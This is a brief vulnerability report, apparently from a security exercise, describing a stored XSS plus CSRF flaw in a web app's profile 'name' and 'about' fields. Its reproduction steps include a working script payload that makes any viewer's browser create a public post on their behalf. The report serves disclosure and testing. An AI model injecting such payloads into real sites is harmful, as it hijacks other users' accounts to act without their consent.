# Vulnerability 3: Stored XSS + CSRF allows to make requests as another user

- Vulnerability: Stored XSS + CSRF
- Where: `name` and `about` fields
- Impact: Allows to make almost all requests as another user

## Steps to reproduce

1. Register a user
2. Create a new **Public** Post
3. Go to `Profile(name)`
4. Insert logged user's password on `currentpassword` field
5. Insert `<script>const Http = new XMLHttpRequest(); Http.open("POST", "/create_post"); Http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); Http.send("content=Checkout%20my%20new%20website%20%3Cform%20action%3D%22https%3A//www.youtube.com/watch%22%3E%3Cinput%20name%3D%22v%22%20type%3D%22hidden%22%20value%3D%22oCEZC9w5cMc%22/%3E%3Cinput%20name%3D%22autoplay%22%20type%3D%22hidden%22%20value%3D%221%22/%3E%3Cinput%20class%3D%22btn%20btn-success%22%20type%3D%22submit%22%20value%3D%22Here%22/%3E%3C/form%3E&type=Public")</script>`
6. Logout
7. Login as another user
8. Refresh page to see the result

[(POC)](vuln3.py)
